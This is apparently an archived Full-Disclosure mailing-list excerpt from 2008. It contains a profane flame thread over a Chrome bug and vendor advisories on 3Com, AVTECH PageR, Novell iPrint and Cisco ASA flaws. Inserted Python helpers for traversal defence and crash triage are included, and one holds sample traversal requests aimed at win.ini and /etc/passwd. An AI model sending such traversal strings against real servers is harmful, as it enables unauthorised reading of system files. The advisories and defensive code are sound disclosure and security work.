> > I for one do not welcome the advertisement overlords. you're not the only one; don't worry. > - - ferg > > -----BEGIN PGP SIGNATURE----- > Version: PGP Desktop 9.6.3 (Build 3017) > > wj8DBQFIvj6aq1pz9mNUZTMRAgEKAKC8rCgCiSPDcSLX8sAe1/ZJRR4fDACeIq9x > X1b4Rd9bxRevUo78azKBi5o= > =ic8T > -----END PGP SIGNATURE----- > -- > "Fergie", a.k.a. Paul Ferguson > Engineering Architecture for the Internet > fergdawg(at)netzero.net > ferg's tech blog: http://fergdawg.blogspot.com/ -- noon silky http://www.themonkeynet.com/armada/ From xploitable at gmail.com Wed Sep 3 10:04:43 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 10:04:43 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> References: <20080903.003706.20417.1@webmail08.vgs.untd.com> <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> Message-ID: <4b6ee9310809030204y2f01e1bdo301dace11ac08e1f@mail.gmail.com> On Wed, Sep 3, 2008 at 8:52 AM, silky wrote: > On Wed, Sep 3, 2008 at 5:37 PM, Paul Ferguson wrote: >> Okay, well you cannot deny this is a lackluster starting point. >> >> I hope Google can use this inauspicious starting point to build >> the advertising empire they desire. >> >> I for one do not welcome the advertisement overlords. > > you're not the only one; don't worry. > > >> - - ferg >> I think the world's biggest hacker HD Moore will be releasing exploits for the browser soon, you know what he's like, so you shouldn't need to worry. 
All the best, n3td3v From beckett.samuel at gmail.com Wed Sep 3 10:31:25 2008 From: beckett.samuel at gmail.com (Samuel Beckett) Date: Wed, 3 Sep 2008 16:31:25 +0700 Subject: [Full-disclosure] Hardcoded Keys Message-ID: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com> What would be the worst case if you implement the following scenario for a credit card transaction: - Store the private keys as disk files and place them in an area on a server that is readable from a DLL that contains the decryption algorithm. - Hardcode one password into a DLL; the other password will be supplied by the service that requests the decryption. This password is then SHA1 hashed with a passphrase -- the result is used to decrypt the private key. After the successful credit card transaction, certain credit card details are then encrypted and stored within the database. From DDI.VulnerabilityAlert at ddifrontline.com Tue Sep 2 20:52:59 2008 From: DDI.VulnerabilityAlert at ddifrontline.com (DDI_Vulnerability_Alert) Date: Tue, 2 Sep 2008 14:52:59 -0500 Subject: [Full-disclosure] DDIVRT-2008-14 3Com Wireless 8760 Dual Radio 11a/b/g PoE Access Point Malformed HTTP POST DoS Message-ID: <2571D31D42513640AE1632FEE100E0E40246F1F6@hypercom.defense.local> Title --------- DDIVRT-2008-14 3Com Wireless 8760 Dual Radio 11a/b/g PoE Access Point Malformed HTTP POST DoS Severity -------- Medium Date Discovered --------------- May 20, 2008 Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: Brandon Shilling and r at b13$ Vulnerability Description ------------------------- The 3Com Wireless 8760 Dual Radio 11a/b/g PoE Access Point is an enterprise-grade wireless access point.
The web management interface is vulnerable to a DoS condition due to improper validation of malformed HTTP POST requests. Successful exploitation will result in a complete DoS of the device. Solution Description -------------------- 3Com has not addressed this issue at this time. Digital Defense, Inc. does not currently know of any workarounds for this flaw. Tested Systems / Software (with versions) ------------------------------------------ Tested against 3Com Wireless 8760 Dual Radio 11a/b/g PoE Access Point, firmware unknown. Vendor Contact -------------- Name: 3Com Website: http://www.3com.com From DDI.VulnerabilityAlert at ddifrontline.com Tue Sep 2 21:21:49 2008 From: DDI.VulnerabilityAlert at ddifrontline.com (DDI_Vulnerability_Alert) Date: Tue, 2 Sep 2008 15:21:49 -0500 Subject: [Full-disclosure] DDIVRT-2008-13 AVTECH PageR Enterprise Directory Traversal Message-ID: <2571D31D42513640AE1632FEE100E0E40246F1F7@hypercom.defense.local> Title ------ DDIVRT-2008-13 AVTECH PageR Enterprise Directory Traversal Severity -------- Medium Date Discovered --------------- July 1, 2008 Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: Corey LeBleu and r at b13$ Vulnerability Description ------------------------- PageR Enterprise is a centralized device / server event monitoring system. The PageR Enterprise server web interface is vulnerable to a common web directory traversal attack. Successful exploitation will result in arbitrary read-only file access outside of the PageR Enterprise web root. Solution Description -------------------- AVTECH has addressed this flaw in PageR version 5.0.7, which was available for public use on August 13, 2008. Tested Systems / Software (with versions) ------------------------------------------ Tested against PageR Enterprise/4.3.7 running on a Microsoft Windows 2000 system. Other versions of PageR Enterprise may be vulnerable.
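As an added illustration of the bug class the PageR advisory above describes (editor's code, not AVTECH's; the advisory gives no request details, so the web root and every request path below are constructed): the join pattern that lets ".." walk out of the web root, beside a resolver that fully decodes and canonicalises the request before checking containment, plus a helper for picking such requests out of an access log. Backslashes are treated as separators because the tested host was Windows 2000.

```python
import os
from urllib.parse import unquote

# Constructed web root. It does not need to exist for the path arithmetic
# below, and nothing here reflects the real PageR layout.
WEB_ROOT = "/srv/pager/www"

# Constructed sample of request paths as they might appear in an access log.
SAMPLE_REQUESTS = [
    "/index.html",
    "/logs/today.txt",
    "/../../../winnt/win.ini",
    "/%2e%2e%2f%2e%2e%2fwinnt%2fwin.ini",
    "/..%255c..%255cboot.ini",
]


def decode_fully(path, max_rounds=3):
    """Undo percent-encoding until it stops changing, so %2e%2e%2f and the
    double-encoded %252e%252e%252f both end up as '../'. Bounded so hostile
    input cannot keep us looping."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def naive_resolve(web_root, request_path):
    """The pattern that produces a traversal bug: strip the leading slash and
    glue the client-supplied path under the web root. '..' segments survive
    normalisation and land outside the root."""
    return os.path.normpath(os.path.join(web_root, request_path.lstrip("/")))


def resolve_under_root(web_root, request_path):
    """Safe variant: decode, canonicalise, then insist the result is the root
    itself or strictly inside it. Returns the absolute path to serve, or None
    when the request would escape the root."""
    root = os.path.abspath(web_root)
    rel = decode_fully(request_path)
    if "\x00" in rel:                  # NUL would truncate the path in C APIs
        return None
    rel = rel.replace("\\", "/")       # Windows hosts accept backslashes too
    rel = rel.lstrip("/")              # keep os.path.join from discarding root
    candidate = os.path.abspath(os.path.join(root, rel))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def suspicious_requests(paths=SAMPLE_REQUESTS, web_root=WEB_ROOT):
    """Log-review helper: the request paths the safe resolver would refuse,
    i.e. the ones worth looking at after a traversal advisory."""
    return [p for p in paths if resolve_under_root(web_root, p) is None]


if __name__ == "__main__":
    print("naive:", naive_resolve(WEB_ROOT, "../../etc/passwd"))
    print("safe: ", resolve_under_root(WEB_ROOT, "../../etc/passwd"))
    print("flagged:", suspicious_requests())
```

The containment test compares against `root + os.sep`, not `root` alone, so a sibling directory such as `/srv/pager/wwwroot` does not pass as a prefix match; the decode loop matters because a single `unquote` leaves `..%255c` looking harmless.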
Vendor Contact -------------- Name: AVTECH Website: http://avtech.com/ Contact Information: Info at AVTECH.com From remove-vuln at secunia.com Wed Sep 3 09:42:25 2008 From: remove-vuln at secunia.com (Secunia Research) Date: Wed, 3 Sep 2008 10:42:25 +0200 Subject: [Full-disclosure] Secunia Research: Novell iPrint Client nipplib.dll "IppCreateServerRef()" Buffer Overflow Message-ID: <200809030842.m838gP6f022700@ca.secunia.com> ====================================================================== Secunia Research 03/09/2008 - Novell iPrint Client - - nipplib.dll "IppCreateServerRef()" Buffer Overflow - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * Novell iPrint Client 4.36 * Novell iPrint Client for Vista 5.04 * Novell iPrint Client for Vista 5.06 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Vendor's Description of Software "Neither you nor your users have time to devote to a complex printing environment. 
That's why Novell iPrint extends print services securely across multiple networks and operating systems. Using proven Internet technologies, iPrint transforms your Novell Distributed Print Services® (NDPS®) printers into Net-enabled printers, making all your printing resources instantly accessible with a Web browser and a few mouse clicks". Product Link: http://www.novell.com/products/openenterpriseserver/iprint.html ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Novell iPrint Client, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the "IppCreateServerRef()" function in nipplib.dll. This can be exploited to cause a heap-based buffer overflow by passing an overly long, specially crafted string as argument to either "GetPrinterURLList()", "GetPrinterURLList2()", or "GetFileList2()" as provided by the Novell iPrint ActiveX control (ienipp.ocx). Successful exploitation may allow execution of arbitrary code. ====================================================================== 5) Solution Update to version 4.38 or 5.08. ====================================================================== 6) Time Table 25/08/2008 - Vendor notified. 26/08/2008 - Vendor response. 03/09/2008 - Public disclosure. ====================================================================== 7) Credits Discovered by Carsten Eiram, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2008-2436 for the vulnerability.
======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-33/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

From urlancomp at gmail.com Wed Sep 3 13:36:33 2008
From: urlancomp at gmail.com (Urlan)
Date: Wed, 3 Sep 2008 09:36:33 -0300
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To: <200809030018.07155.tmdhat@gmail.com>
References: <985632087.20080903052045@gmail.com> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> <200809030018.07155.tmdhat@gmail.com>
Message-ID: <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com>

PT: FUCK OFF!

1) Sorry, but I didn't see you helping with anything anywhere.
2) I speak and write in Portuguese; I am in Brazil. Thanks, but I don't want to post things in English for whoever to read.

Urlan

On Wed, Sep 3, 2008 at 12:18 AM, The Mad Hatter wrote:
> On Tuesday 02 September 2008 23:28:33 Urlan wrote:
> > Why all this fuss over a bug in the beta version?!
> >
>
> pt: não seja tão imbecil
> en: don't be such a moron
>
> you are lame twice; first for posting in portuguese, then for giving a
> stupid negative contribution to the thread. if you don't have shit to say at least
> don't say shit.
>
> --
> tmh
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From akl at experian.dk Wed Sep 3 13:41:36 2008
From: akl at experian.dk (Anders Klixbull)
Date: Wed, 3 Sep 2008 14:41:36 +0200
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To: <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com>
References: <985632087.20080903052045@gmail.com> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> <200809030018.07155.tmdhat@gmail.com> <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32438@PRO-EXCHANGESRV.experian.dk>

shut the fuck up

________________________________
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Urlan
Sent: 3 September 2008 14:37
To: The Mad Hatter
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Google Chrome Browser Vulnerability

PT: FUCK OFF!

1) Sorry, but I didn't see you helping with anything anywhere.
2) I speak and write in Portuguese; I am in Brazil. Thanks, but I don't want to post things in English for whoever to read.

Urlan

On Wed, Sep 3, 2008 at 12:18 AM, The Mad Hatter wrote:
On Tuesday 02 September 2008 23:28:33 Urlan wrote:
> Why all this fuss over a bug in the beta version?!
>

pt: não seja tão imbecil
en: don't be such a moron

you are lame twice; first for posting in portuguese, then for giving a stupid negative contribution to the thread. if you don't have shit to say at least don't say shit.

--
tmh

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From urlancomp at gmail.com Wed Sep 3 13:59:33 2008
From: urlancomp at gmail.com (Urlan)
Date: Wed, 3 Sep 2008 09:59:33 -0300
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To: <4bb6f2de0809030554h276ba84cj7e45c55ffe44924@mail.gmail.com>
References: <985632087.20080903052045@gmail.com> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> <200809030018.07155.tmdhat@gmail.com> <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com> <4bb6f2de0809030554h276ba84cj7e45c55ffe44924@mail.gmail.com>
Message-ID: <8b88d71c0809030559h6ded64d4v9e10fa559adf88c0@mail.gmail.com>

Sorry for my mistake.

Urlan

2008/9/3 Fabio N Sarmento [ Gmail ]
> So what the fuck are you doing here?
> This list speaks English; if you don't want to, get out.
>
> 2008/9/3 Urlan
>
>> PT: FUCK OFF!
>>
>> 1) Sorry, but I didn't see you helping with anything anywhere.
>> 2) I speak and write in Portuguese; I am in Brazil. Thanks, but I don't want to post things in English for whoever to read.
>>
>> Urlan
>>
>>
>> On Wed, Sep 3, 2008 at 12:18 AM, The Mad Hatter wrote:
>>
>>> On Tuesday 02 September 2008 23:28:33 Urlan wrote:
>>> > Why all this fuss over a bug in the beta version?!
>>> >
>>>
>>> pt: não seja tão imbecil
>>> en: don't be such a moron
>>>
>>> you are lame twice; first for posting in portuguese, then for giving a
>>> stupid negative contribution to the thread. if you don't have shit to say at
>>> least don't say shit.
>>>
>>> --
>>> tmh
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
> If you have any questions, I am at your disposal
>
> + Cordially,
> + Fábio N Sarmento
>

From fabior2 at gmail.com Wed Sep 3 13:54:08 2008
From: fabior2 at gmail.com (Fabio N Sarmento [ Gmail ])
Date: Wed, 3 Sep 2008 09:54:08 -0300
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To: <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com>
References: <985632087.20080903052045@gmail.com> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> <200809030018.07155.tmdhat@gmail.com> <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com>
Message-ID: <4bb6f2de0809030554h276ba84cj7e45c55ffe44924@mail.gmail.com>

So what the fuck are you doing here?
This list speaks English; if you don't want to, get out.

2008/9/3 Urlan
> PT: FUCK OFF!
>
> 1) Sorry, but I didn't see you helping with anything anywhere.
> 2) I speak and write in Portuguese; I am in Brazil. Thanks, but I don't want to post things in English for whoever to read.
>
> Urlan
>
>
> On Wed, Sep 3, 2008 at 12:18 AM, The Mad Hatter wrote:
>
>> On Tuesday 02 September 2008 23:28:33 Urlan wrote:
>> > Why all this fuss over a bug in the beta version?!
>> >
>>
>> pt: não seja tão imbecil
>> en: don't be such a moron
>>
>> you are lame twice; first for posting in portuguese, then for giving a
>> stupid negative contribution to the thread. if you don't have shit to say at
>> least don't say shit.
>>
>> --
>> tmh
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
If you have any questions, I am at your disposal

+ Cordially,
+ Fábio N Sarmento

From Valdis.Kletnieks at vt.edu Wed Sep 3 17:06:01 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 03 Sep 2008 12:06:01 -0400
Subject: [Full-disclosure] Google Chrome Browser Vulnerability
In-Reply-To: Your message of "Wed, 03 Sep 2008 10:04:43 BST."
<4b6ee9310809030204y2f01e1bdo301dace11ac08e1f@mail.gmail.com>
References: <20080903.003706.20417.1@webmail08.vgs.untd.com> <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> <4b6ee9310809030204y2f01e1bdo301dace11ac08e1f@mail.gmail.com>
Message-ID: <18911.1220457961@turing-police.cc.vt.edu>

On Wed, 03 Sep 2008 10:04:43 BST, n3td3v said:
> I think the world's biggest hacker HD Moore

HD is incredibly talented, and deserves a round of applause for Metasploit. However, a minute's thought will show that we don't have a fucking *clue* who the world's biggest hacker is. We have plenty of candidates for "biggest hacker who screwed up and got caught" and "biggest hacker who blabbed to his friends". But just as any ninja you actually see isn't a very good ninja, we won't know who the biggest hacker is. I'd place bets that whoever it is, they're on the RBN payroll...

From victor.stinner at haypocalc.com Wed Sep 3 17:38:43 2008
From: victor.stinner at haypocalc.com (Victor Stinner)
Date: Wed, 3 Sep 2008 18:38:43 +0200
Subject: [Full-disclosure] Fusil the fuzzer version 1.0beta3
Message-ID: <200809031838.43988.victor.stinner@haypocalc.com>

Fusil is a Python library for writing fuzzers and a set of specific fuzzers: Apache, ClamAV, Firefox, gettext, gstreamer, ImageMagick, libpoppler, printf(), Mplayer, ogg123, PHP and Python. The goal is to let you write your fuzzer quickly; Fusil is responsible for managing the fuzzing campaign (creating files, cleaning up at exit, sorting errors, etc.).

With version 1.0, Fusil is safe: it uses a dedicated (UNIX) user to create child processes and limits resources (memory, total number of processes, etc.).
Fusil now uses the python-ptrace debugger to help with error classification (invalid memory read/write, division by zero, stack overflow, ...): it renames the fuzzer working directory (e.g. "exitcode1", "abort", "div_by_zero", ...).

This version is a beta version; it has to be tested as much as possible on all architectures and operating systems. Don't hesitate to report bugs!

Website: http://fusil.hachoir.org/
python-ptrace website: http://python-ptrace.hachoir.org/

The development of version 1.0 (still in the beta phase) took around one year. The project is distributed under the GPLv2 license, is written in Python and is packaged for Debian, Mandriva and OpenEmbedded. The project is developed under Linux, but Fusil works correctly on FreeBSD and should work on any POSIX system (especially UNIX and BSD).

Getting started
---------------

To install Fusil, you will need python-ptrace and a system user "fusil" (and a group "fusil"). To run a fuzzer, type its name, e.g. "fusil-gettext". Each fuzzer has its own options, so don't hesitate to use the "--help" option. For the documentation, browse the doc/ directory. Simple examples are available in the examples/ directory.

python-ptrace only works correctly on Linux (i386, x86_64, PPC32) and FreeBSD (i386). If you have trouble with another architecture/OS, disable it in the Fusil configuration file (~/.config/fusil.conf):

[debugger]
use_debugger = False

Read doc/configuration.rst to learn about other Fusil options.

python-ptrace
-------------

If you don't know python-ptrace: it is written purely in Python and includes the programs strace.py and gdb.py (strace and gdb clones). strace.py is very close to strace, but has more options and works on FreeBSD without the Linux emulation (/proc directory). gdb.py is very limited; it doesn't support threads or symbols, for example.
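The error classification described above (a crashed run gets its working directory renamed after the failure class), as an added Python example that is not Fusil's own code: a small triage harness that runs a target command and names its directory "exitcode1", "abort", "div_by_zero" and so on. The three quoted category names come from the announcement; the function names, the extra categories and the sample commands are assumptions.

```python
"""Fusil-style crash triage: run a target, classify how it died, and rename
its working directory after the failure class. Added example, not Fusil code."""
import os
import signal
import subprocess
import tempfile

# Signal -> category name. "abort" and "div_by_zero" are the names quoted in
# the Fusil announcement; "segfault" and "bus_error" are assumed names in the
# same style.
SIGNAL_CATEGORIES = {
    signal.SIGABRT: "abort",
    signal.SIGFPE: "div_by_zero",
    signal.SIGSEGV: "segfault",
    signal.SIGBUS: "bus_error",
}


def classify_returncode(returncode):
    """Map a subprocess return code to a category name.

    subprocess reports death-by-signal as a negative return code (-signum);
    a clean exit (0) is not an error and yields None; any other exit code
    becomes "exitcode<N>" as in the announcement ("exitcode1")."""
    if returncode == 0:
        return None
    if returncode < 0:
        try:
            sig = signal.Signals(-returncode)
        except ValueError:
            return "signal%d" % -returncode  # number not known to this platform
        return SIGNAL_CATEGORIES.get(sig, sig.name.lower())
    return "exitcode%d" % returncode


def run_and_classify(argv, workdir, timeout=10):
    """Run argv inside workdir, classify the outcome and rename workdir.

    Returns (category, final_path). A run that exceeds the timeout is filed
    as "timeout"; a clean run keeps its directory name."""
    try:
        proc = subprocess.run(argv, cwd=workdir, capture_output=True,
                              timeout=timeout)
        category = classify_returncode(proc.returncode)
    except subprocess.TimeoutExpired:
        category = "timeout"
    if category is None:
        return None, workdir
    # Keep repeated findings distinct: abort, abort-2, abort-3, ...
    base = os.path.join(os.path.dirname(workdir), category)
    target, n = base, 1
    while os.path.exists(target):
        n += 1
        target = "%s-%d" % (base, n)
    os.rename(workdir, target)
    return category, target


if __name__ == "__main__":
    # Constructed sample targets: a shell that exits 1 and one that aborts itself.
    samples = [["sh", "-c", "exit 1"], ["sh", "-c", "kill -ABRT $$"]]
    root = tempfile.mkdtemp(prefix="triage-")
    for i, argv in enumerate(samples):
        workdir = os.path.join(root, "run%d" % i)
        os.mkdir(workdir)
        print(argv, "->", run_and_classify(argv, workdir))
```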
From psirt at cisco.com Wed Sep 3 18:15:00 2008
From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team)
Date: Wednesday, 03 September 2008 12:15:00 -0500
Subject: [Full-disclosure] Cisco Security Advisory: Remote Access VPN and SIP Vulnerabilities in Cisco PIX and Cisco ASA
Message-ID: <20080903121500.pixasa@psirt.cisco.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Remote Access VPN and SIP Vulnerabilities in Cisco PIX and Cisco ASA

Advisory ID: cisco-sa-20080903-asa

Revision 1.0

For Public Release 2008 September 3 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

Multiple vulnerabilities exist in the Cisco ASA 5500 Series Adaptive Security Appliances and Cisco PIX Security Appliances that may result in a reload of the device or disclosure of confidential information. This security advisory outlines details of the following vulnerabilities:

  * Erroneous SIP Processing Vulnerabilities
  * IPSec Client Authentication Processing Vulnerability
  * SSL VPN Memory Leak Vulnerability
  * URI Processing Error Vulnerability in SSL VPNs
  * Potential Information Disclosure in Clientless VPNs

Note: These vulnerabilities are independent of each other. A device may be affected by one vulnerability and not affected by another.

Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate some of these vulnerabilities are available.

This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20080903-asa.shtml

Affected Products
=================

The following paragraphs describe the affected Cisco ASA and Cisco PIX software versions:

Vulnerable Products
+------------------

The following sections provide details on the versions of Cisco ASA that are affected by each vulnerability.
The show version command-line interface (CLI) command can be used to determine if a vulnerable version of the Cisco PIX or Cisco ASA software is running. The following example shows a Cisco ASA device that runs software release 8.0(2):

    ASA# show version
    Cisco Adaptive Security Appliance Software Version 8.0(2)
    Device Manager Version 6.0(1)
    [...]

Customers who use the Cisco Adaptive Security Device Manager (ASDM) to manage their devices can find their software version displayed in a table in the login window or in the upper left corner of the ASDM window.

Erroneous SIP Processing Vulnerabilities

Cisco PIX and Cisco ASA devices configured for SIP inspection are vulnerable to multiple processing errors that may result in denial of service attacks. Cisco PIX and ASA software versions prior to 7.0(7)16, 7.1(2)71, 7.2(4)7, 8.0(3)20, and 8.1(1)8 are vulnerable to these SIP processing errors.

IPSec Client Authentication Processing Vulnerability

Cisco PIX and Cisco ASA devices that terminate remote access VPN connections are vulnerable to a denial of service attack if the device is running software versions prior to 7.2(4)2, 8.0(3)14, and 8.1(1)4. Cisco PIX and Cisco ASA devices that run software versions 7.0 and 7.1 are not affected by this vulnerability.

SSL VPN Memory Leak Vulnerability

Cisco ASA devices that terminate clientless remote access VPN connections are vulnerable to a denial of service attack affecting the SSL processing software if the device is running a software version prior to 7.2(4)2, 8.0(3)14, or 8.1(1)4. Cisco ASA devices that run software versions 7.0 and 7.1 are not affected by this vulnerability.

URI Processing Error Vulnerability in SSL VPNs

Cisco ASA devices that terminate clientless remote access VPN connections are vulnerable to a denial of service attack in the HTTP server if the device is running software versions prior to 8.0(3)15, and 8.1(1)5. Cisco ASA devices that run software versions 7.0, 7.1, or 7.2 are not affected by this vulnerability.

Potential Information Disclosure in Clientless VPNs

Cisco ASA devices that terminate clientless remote access VPN connections are vulnerable to potential information disclosure if the device is running affected 8.0 or 8.1 software versions. Cisco ASA devices running software versions 7.0, 7.1, or 7.2 are not affected by this vulnerability. Cisco ASA devices that run software versions prior to 8.0(3)15 and 8.1(1)4, or after 8.0(3)16 and 8.1(1)5, are also not affected by this vulnerability.

Products Confirmed Not Vulnerable
+--------------------------------

The Cisco Firewall Services Module (FWSM) is not affected by any of these vulnerabilities.

Cisco PIX security appliances running software versions 6.x are not vulnerable.

IOS, IOS XR, and Cisco Unified Border Elements (CUBE) are not vulnerable to these issues.

No other Cisco products are currently known to be affected by these vulnerabilities.

Details
=======

The following sections provide details to help determine if a device may be affected by any of the vulnerabilities.

Erroneous SIP Processing Vulnerabilities

Cisco PIX and Cisco ASA devices configured for SIP inspection are vulnerable to multiple processing errors that may result in denial of service attacks. All Cisco PIX and Cisco ASA software releases may be vulnerable to these SIP processing vulnerabilities. A successful attack may result in a reload of the device.

SIP inspection is enabled with the inspect sip command. To determine whether the Cisco PIX or Cisco ASA security appliance is configured to support inspection of SIP packets, log in to the device and issue the CLI command show service-policy | include sip. If the output contains the text Inspect: sip and some statistics, then the device has a vulnerable configuration.
The following example shows a vulnerable Cisco ASA Security Appliance:

    asa#show service-policy | include sip
    Inspect: sip, packet 0, drop 0, reset-drop 0
    asa#

These vulnerabilities are documented in the following Cisco Bug IDs and have been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2732.

  * CSCsq07867
  * CSCsq57091
  * CSCsk60581
  * CSCsq39315

IPSec Client Authentication Processing Vulnerability

Cisco PIX and Cisco ASA devices configured to terminate client based VPN connections are vulnerable to a crafted authentication processing vulnerability if they are running software versions 7.2, 8.0, or 8.1. Devices that run software versions 7.0 or 7.1 are not affected by this vulnerability. A successful attack may result in a reload of the device.

Remote access VPN connections will have Internet Security Association and Key Management Protocol (ISAKMP) enabled on an interface with the crypto command, such as: crypto isakmp enable outside.

This vulnerability is documented in Cisco Bug ID CSCso69942 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2733.

SSL VPN Memory Leak Vulnerability and URI Processing Error Vulnerability in SSL VPNs

A crafted SSL or HTTP packet may cause a denial of service condition on a Cisco ASA device that is configured to terminate clientless VPN connections. A successful attack may result in a reload of the device. Cisco ASA devices that run versions 7.2, 8.0, or 8.1 with clientless SSL VPNs enabled may be affected by this vulnerability. Devices that run software versions 7.0 and 7.1 are not affected by this vulnerability.

Clientless VPN, SSL VPN Client, and AnyConnect connections are enabled via the webvpn command. For example, the following configuration shows a Cisco ASA with Clientless VPNs configured and enabled. In this case the ASA will listen for VPN connections on the default port, TCP port 443:

    http server enable
    !
    webvpn
     enable outside

Note that with this particular configuration, the device is vulnerable to attacks coming from the outside interface due to the enable outside command within the webvpn group configuration.

These vulnerabilities are documented in Cisco Bug IDs CSCso66472 and CSCsq19369. They have been assigned Common Vulnerabilities and Exposures (CVE) identifiers CVE-2008-2734 and CVE-2008-2735.

Potential Information Disclosure in Clientless VPNs

On Cisco ASA devices configured to terminate clientless VPN connections, an attacker may be able to discover potentially sensitive information such as usernames and passwords. This attack requires an attacker to convince a user to visit a rogue web server, reply to an e-mail, or interact with a service to successfully exploit the vulnerability. Cisco ASA devices running software versions 8.0 or 8.1 with clientless VPNs enabled may be affected by this vulnerability. Cisco ASA devices that run software versions 7.0, 7.1, or 7.2 are not vulnerable to this vulnerability.

Clientless SSL VPN connections are enabled via the webvpn command. For example, the following configuration shows a Cisco ASA device with Clientless VPNs configured and enabled. In this case the Cisco ASA device will listen for VPN connections on the default port, TCP port 443:

    http server enable
    !
    webvpn
     enable outside

Note that with this particular configuration, the device is vulnerable to attacks coming from the outside interface due to the enable outside command within the webvpn group configuration.

This vulnerability is documented in Cisco Bug ID CSCsq45636 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2736.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is calculated in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss

Erroneous SIP Processing Vulnerabilities

